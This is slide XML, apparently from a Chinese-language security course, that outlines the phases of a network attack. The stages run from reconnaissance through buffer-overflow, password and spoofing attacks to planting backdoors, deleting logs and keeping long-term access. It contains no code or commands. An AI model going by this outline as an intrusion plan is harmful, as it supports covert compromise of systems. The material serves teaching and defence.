              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="65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目的：</a:t>
                </a:r>
                <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1800" b="1">
                  <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                </a:endParaRPr>
              </a:p>
              <a:p>
                <a:pPr>
                  <a:spcBef>
                    <a:spcPct val="50000"/>
                  </a:spcBef>
                </a:pPr>
                <a:r>
                  <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1600" b="1">
                    <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                    <a:ea typeface="楷体_GB2312" pitchFamily="49" charset="-122"/>
                  </a:rPr>
                  <a:t>收集信息</a:t>
                </a:r>
                <a:r>
                  <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1600" b="1" smtClean="0">
                    <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                    <a:ea typeface="楷体_GB2312" pitchFamily="49" charset="-122"/>
                  </a:rPr>
                  <a:t>，攻击</a:t>
                </a:r>
                <a:r>
                  <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1600" b="1">
                    <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                    <a:ea typeface="楷体_GB2312" pitchFamily="49" charset="-122"/>
                  </a:rPr>
                  <a:t>决策</a:t>
                </a:r>
                <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1600" b="1">
                  <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                  <a:ea typeface="楷体_GB2312" pitchFamily="49" charset="-122"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="51245" name="Group 45"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="3571677" y="1447800"/>
            <a:ext cx="2071687" cy="4551363"/>
            <a:chOff x="2515" y="912"/>
            <a:chExt cx="1305" cy="2867"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="51231" name="Text Box 31"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2702" y="912"/>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anose="02020603050405020304" pitchFamily="18" charset="0"/>
                  <a:ea typeface="黑体" pitchFamily="49" charset="-122"/>
                </a:rPr>
                <a:t>攻击</a:t>
              </a:r>
              <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="黑体" pitchFamily="49" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="51232" name="Rectangle 32"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2515" y="2040"/>
              <a:ext cx="1305" cy="1739"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="accent2">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3" name="Text Box 33"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2562" y="2087"/>
              <a:ext cx="1258" cy="138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内容：</a:t>
              </a:r>
              <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1800" b="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:pPr>
                <a:spcBef>
                  <a:spcPct val="50000"/>
                </a:spcBef>
              </a:pPr>
              <a:r>
                <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1600" b="1">
                  <a:latin typeface="楷体_GB2312" pitchFamily="49" charset="-122"/>
                  <a:ea typeface="楷体_GB2312" pitchFamily="49" charset="-122"/>
                </a:rPr>
                <a:t>获得远程权限</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进入远程系统</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提升本地权限</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进一步扩展权限</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进行实质性操作</a:t>
              </a:r>
              <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1600" b="1">
                <a:latin typeface="楷体_GB2312" pitchFamily="49" charset="-122"/>
                <a:ea typeface="楷体_GB2312" pitchFamily="49" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="51234" name="Rectangle 34"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2515" y="1335"/>
              <a:ext cx="1305" cy="705"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="accent2">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5" name="Text Box 35"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2562" y="1382"/>
              <a:ext cx="1258" cy="61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目的：</a:t>
              </a:r>
              <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1800" b="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:pPr>
                <a:spcBef>
                  <a:spcPct val="50000"/>
                </a:spcBef>
              </a:pPr>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="1600" b="1">
                  <a:latin typeface="楷体_GB2312" pitchFamily="49" charset="-122"/>
                  <a:ea typeface="楷体_GB2312" pitchFamily="49" charset="-122"/>
                </a:rPr>
                <a:t>实施</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1600" b="1" smtClean="0">
                  <a:latin typeface="楷体_GB2312" pitchFamily="49" charset="-122"/>
                  <a:ea typeface="楷体_GB2312" pitchFamily="49" charset="-122"/>
                </a:rPr>
                <a:t>攻击</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1600" b="1">
                  <a:latin typeface="楷体_GB2312" pitchFamily="49" charset="-122"/>
                  <a:ea typeface="楷体_GB2312" pitchFamily="49" charset="-122"/>
                </a:rPr>
                <a:t>，获得</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1600" b="1" smtClean="0">
                  <a:latin typeface="楷体_GB2312" pitchFamily="49" charset="-122"/>
                  <a:ea typeface="楷体_GB2312" pitchFamily="49" charset="-122"/>
                </a:rPr>
                <a:t>系统一定</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1600" b="1">
                  <a:latin typeface="楷体_GB2312" pitchFamily="49" charset="-122"/>
                  <a:ea typeface="楷体_GB2312" pitchFamily="49" charset="-122"/>
                </a:rPr>
                <a:t>权限</a:t>
              </a:r>
              <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1600" b="1">
                <a:latin typeface="楷体_GB2312" pitchFamily="49" charset="-122"/>
                <a:ea typeface="楷体_GB2312" pitchFamily="49" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="51236" name="AutoShape 36"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2758877"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666699"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="51247" name="Group 47"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="6549829" y="1447800"/>
            <a:ext cx="2165350" cy="4551363"/>
            <a:chOff x="4391" y="912"/>
            <a:chExt cx="1364" cy="2867"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="51241" name="Rectangle 41"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4425" y="1335"/>
              <a:ext cx="1305" cy="705"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="accent4">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6" name="Group 46"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="4391" y="912"/>
              <a:ext cx="1364" cy="2867"/>
              <a:chOff x="4391" y="912"/>
              <a:chExt cx="1364" cy="2867"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="51238" name="Text Box 38"/>
              <p:cNvSpPr txBox="1">
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4391" y="912"/>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b="1">
                    <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                    <a:ea typeface="黑体" pitchFamily="49" charset="-122"/>
                  </a:rPr>
                  <a:t>攻击后</a:t>
                </a:r>
                <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2400" b="1">
                  <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                  <a:ea typeface="黑体" pitchFamily="49" charset="-122"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="51239" name="Rectangle 39"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4425" y="2040"/>
                <a:ext cx="1305" cy="1739"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:schemeClr val="accent4">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40" name="Text Box 40"/>
              <p:cNvSpPr txBox="1">
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4472" y="2087"/>
                <a:ext cx="1258" cy="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内容：</a:t>
                </a:r>
                <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1800" b="1">
                  <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                </a:endParaRPr>
              </a:p>
              <a:p>
                <a:pPr>
                  <a:spcBef>
                    <a:spcPct val="50000"/>
                  </a:spcBef>
                </a:pPr>
                <a:r>
                  <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1600" b="1">
                    <a:latin typeface="楷体_GB2312" pitchFamily="49" charset="-122"/>
                    <a:ea typeface="楷体_GB2312" pitchFamily="49" charset="-122"/>
                  </a:rPr>
                  <a:t>植入后门木马</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删除日志</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修补明显的漏洞</a:t>
                </a:r>
                <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1600" b="1">
                  <a:latin typeface="楷体_GB2312" pitchFamily="49" charset="-122"/>
                  <a:ea typeface="楷体_GB2312" pitchFamily="49" charset="-122"/>
                </a:endParaRPr>
              </a:p>
              <a:p>
                <a:pPr>
                  <a:spcBef>
                    <a:spcPct val="50000"/>
                  </a:spcBef>
                </a:pPr>
                <a:r>
                  <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1600" b="1">
                    <a:latin typeface="楷体_GB2312" pitchFamily="49" charset="-122"/>
                    <a:ea typeface="楷体_GB2312" pitchFamily="49" charset="-122"/>
                  </a:rPr>
                  <a:t>进一步渗透扩展</a:t>
                </a:r>
                <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1600" b="1">
                  <a:latin typeface="楷体_GB2312" pitchFamily="49" charset="-122"/>
                  <a:ea typeface="楷体_GB2312" pitchFamily="49" charset="-122"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="51242" name="Text Box 42"/>
              <p:cNvSpPr txBox="1">
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="447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anose="02020603050405020304" pitchFamily="18" charset="0"/>
                  </a:rPr>
                  <a:t>目的：</a:t>
                </a:r>
                <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1800" b="1">
                  <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                </a:endParaRPr>
              </a:p>
              <a:p>
                <a:pPr>
                  <a:spcBef>
                    <a:spcPct val="50000"/>
                  </a:spcBef>
                </a:pPr>
                <a:r>
                  <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1600" b="1">
                    <a:latin typeface="楷体_GB2312" pitchFamily="49" charset="-122"/>
                    <a:ea typeface="楷体_GB2312" pitchFamily="49" charset="-122"/>
                  </a:rPr>
                  <a:t>消除痕迹，长期维持</a:t>
                </a:r>
                <a:r>
                  <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1600" b="1" smtClean="0">
                    <a:latin typeface="楷体_GB2312" pitchFamily="49" charset="-122"/>
                    <a:ea typeface="楷体_GB2312" pitchFamily="49" charset="-122"/>
                  </a:rPr>
                  <a:t>一定权限</a:t>
                </a:r>
                <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1600" b="1">
                  <a:latin typeface="楷体_GB2312" pitchFamily="49" charset="-122"/>
                  <a:ea typeface="楷体_GB2312" pitchFamily="49" charset="-122"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="51243" name="AutoShape 43"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5791002"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1248"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="blinds(vertical)">
                                      <p:cBhvr>
                                        <p:cTn id="7" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="512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36"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="12" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="51236"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="0-#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="13" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="512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1245"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="18" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="51245"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="19" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="5124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1243"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="24" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="51243"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="0-#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="25" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="5124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51247"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="30" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="51247"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="1+#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="31" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="512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6" grpId="0" animBg="1"/>
      <p:bldP spid="512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idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>攻击 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>&amp; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>威胁</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>攻击往往要利用一个或多个威胁</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>有时攻击和威胁不作区分</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="657410" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>Attack Vs Threat（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>续）</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="62466" name="日期占位符 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5129336" y="6407944"/>
            <a:ext cx="1026840" cy="450056"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeo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1718EEC8-DCED-4ADC-A447-CD0CAD0BCD6B}" type="datetime1">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攻击</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>的种类</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="51244" name="Group 44"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="499864" y="1447804"/>
            <a:ext cx="2111374" cy="3349626"/>
            <a:chOff x="580" y="912"/>
            <a:chExt cx="1330" cy="2110"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="51225" name="Text Box 25"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="580" y="912"/>
              <a:ext cx="13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anose="02020603050405020304" pitchFamily="18" charset="0"/>
                  <a:ea typeface="黑体" pitchFamily="49" charset="-122"/>
                </a:rPr>
                <a:t>预</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2400" b="1" smtClean="0">
                  <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                  <a:ea typeface="黑体" pitchFamily="49" charset="-122"/>
                </a:rPr>
                <a:t>攻击</a:t>
              </a:r>
              <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="黑体" pitchFamily="49" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="51226" name="Rectangle 26"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="605" y="1283"/>
              <a:ext cx="1305" cy="1739"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="bg2">
                <a:lumMod val="9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端口扫描</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1800" b="1"/>
            </a:p>
            <a:p>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="1800" b="1"/>
                <a:t>漏洞扫描</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1800" b="1"/>
            </a:p>
            <a:p>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="1800" b="1"/>
                <a:t>操作系统类型鉴别</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1800" b="1"/>
            </a:p>
            <a:p>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="1800" b="1"/>
                <a:t>网络拓扑</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="1800" b="1" smtClean="0"/>
                <a:t>分析</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1800" b="1"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="51245" name="Group 45"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="3571677" y="1447800"/>
            <a:ext cx="2071687" cy="3373438"/>
            <a:chOff x="2515" y="912"/>
            <a:chExt cx="1305" cy="2125"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="51231" name="Text Box 31"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2702" y="912"/>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anose="02020603050405020304" pitchFamily="18" charset="0"/>
                  <a:ea typeface="黑体" pitchFamily="49" charset="-122"/>
                </a:rPr>
                <a:t>攻击</a:t>
              </a:r>
              <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="黑体" pitchFamily="49" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="51232" name="Rectangle 32"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2515" y="1298"/>
              <a:ext cx="1305" cy="1739"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="accent2">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缓冲区溢出攻击</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1800" b="1"/>
            </a:p>
            <a:p>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="1800" b="1" smtClean="0"/>
                <a:t>脚本</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="1800" b="1"/>
                <a:t>程序漏洞攻击</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1800" b="1"/>
            </a:p>
            <a:p>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="1800" b="1"/>
                <a:t>口令攻击</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1800" b="1"/>
            </a:p>
            <a:p>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="1800" b="1"/>
                <a:t>错误及弱配置攻击</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1800" b="1"/>
            </a:p>
            <a:p>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="1800" b="1"/>
                <a:t>网络欺骗与劫持攻击 </a:t>
              </a:r>
